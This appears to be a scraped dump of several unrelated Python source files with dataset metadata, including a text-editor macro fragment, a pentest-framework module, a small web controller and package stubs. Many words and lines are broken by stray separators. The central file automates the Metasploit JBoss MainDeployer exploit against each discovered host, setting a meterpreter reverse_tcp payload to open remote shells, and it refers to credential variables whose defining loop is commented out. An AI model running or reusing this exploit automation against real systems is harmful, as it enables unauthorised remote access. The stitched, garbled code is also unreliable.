This macro executes when the user hits <enter> to finalise the
input. The mini applet is closed and the extracted string passed
to the (overloaded) ``inputCompleted`` method in the
``MiniAppletBaseQuery`` object.
|Signature|
* *applet*: 'MiniApplet'
* *widget*: ``QTextEdit``
"""
def __init__(self):
super().__init__()
self.qteSetAppletSignature('MiniApplet')
self.qteSetWidgetSignature('QTextEdit')
# ID of the completions buffer. Note that this name is
# implicitly agreed upon between this macro and the
# Autocomp | leteInput macro. Therefore, ensure to change the
# name in both locations if so desired.
self.completionsAppID = '__Buffer Completions__'
def qteRun(self):
# Fetch the final user input.
userInput = self.qteWidget.toPlainText()
# If a history list was supplied to ``MiniA | ppletBaseQuery``
# then add the latest entry.
global qteQueryHistory, qteHistIdx
if isinstance(qteQueryHistory, list):
qteQueryHistory.append(userInput)
qteHistIdx = len(qteQueryHistory)
# P |
MooseDojo/apt2 | modules/action/exploit_msf_jboss_maindeployer.py | Python | mit | 4,087 | 0.004894 | import re
from core.actionModule import actionModule
from core.keystore import KeyStore as kb
from core.mymsf import myMsf
from core.utils import Utils
class exploit_msf_jboss_maindeployer(actionModule):
def __init__(self, config, display, lock):
super(exploit_msf_jboss_maindeployer, self).__init__(config, display, lock)
self.triggers = ["newJbossPassword"]
self.requirements = ["msfconsole"]
self.types = ["http"]
self.title = "Attempt to gain shell via Jboss"
self.shortName = "MSFJbossMainDeployer"
self.description = "execute [exploit/multi/http/jboss_maindeployer] on each target"
self.safeLevel = 3
def getTargets(self):
self.targets = kb.get('port/tcp/443', 'port/tcp/8443', 'service/https', 'service/ssl')
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# If any results are succesful, this will become true and Fire will be called in the end
callFire = False
# loop over each target
for t in self.targets:
ports = kb.get('service/http/' + t + '/tcp')
for p in ports:
#users = kb.get("creds/host/" + t + "/port/" + p + "/service/jboss/username")
#for user in users:
# passwords = kb.get("creds/host/" + t + "/port/" + p + "/service/jboss/username/" + user + "/password")
# for password in passwords:
# # verify we have not tested this host before
# if not self.seentarget(t+p+user+password):
# # add the new IP to the already seen list
# self.addseentarget(t+p+user+password)
myMsf.lock.acquire()
self.display.verbose(self.shortName + " - Connecting to " + t)
msf.execute("use exploit/multi/http/jboss_maindeployer\n")
msf.execute("set RHOST %s\n" % t)
msf.execute("set RPORT %s\n" % p)
msf.execute("set SVHOST %s\n" % self.config['lhost'])
# msf.execute("set httpusername %s\n" % user)
# msf.execute("set httppassword %s\n" % password)
msf.execute("set target 2")
msf.execute("set PAYLOAD linux/x86/meterpreter/reverse_tcp")
msf.execute("set LPORT 4445")
msf.execute("set fingerprintcheck false\n")
msf.execute("exploit -j\n")
msf.sleep(int(self.config['msfexploitdelay']))
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
result = msf.getResult()
myMsf.lock.release()
Utils.writeFile(result, outfile)
parts = re.findall(".*Meterpreter session.*", result)
| for part in parts:
callFire = True
self.addVuln(t, self.shortName, {"port": p, "username": user, "password": password, "output": outfile.replace("/", "%2F")})
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F" ))
if callFire:
self.fire("msfSession")
| # clean up after ourselves
result = msf.cleanup()
return
|
AEDA-Solutions/matweb | backend/Controllers/Curriculo.py | Python | mit | 541 | 0.014787 | # coding=utf-8
from Framework.Controller import Controller
from Database.Controllers.Curriculo import Curriculo as BDCurriculo
from Models.Curriculo.RespostaListar import RespostaListar
from Database.Models.Curriculo import Curriculo as ModelCurriculo
class Curriculo(Controller):
def Listar(self,pedido_listar):
return RespostaListar(BDCurriculo().pegarCurriculos("WHERE id_curso = %s LIMIT %s OFFSET %s",(pedido_listar.getId_cur | so(),str(pedido_listar.getQuantidade()) | ,(str(pedido_listar.getQuantidade()*pedido_listar.getPagina())))))
|
caromedellin/starting_git | test.py | Python | mit | 32 | 0 | print("this is a test file") | ≈
| |
bigdig/vnpy | vnpy/api/oes/__init__.py | Python | mit | 109 | 0.018349 | #from .vnctpm | d import MdApi
from .vnoestd import TdApi
from .vnoesmd import MdApi
from .oe | s_constant import * |
dotKom/onlineweb4 | apps/feedback/__init__.py | Python | mit | 62 | 0 | defa | ult_app_config = 'apps.fee | dback.appconfig.FeedbackConfig'
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.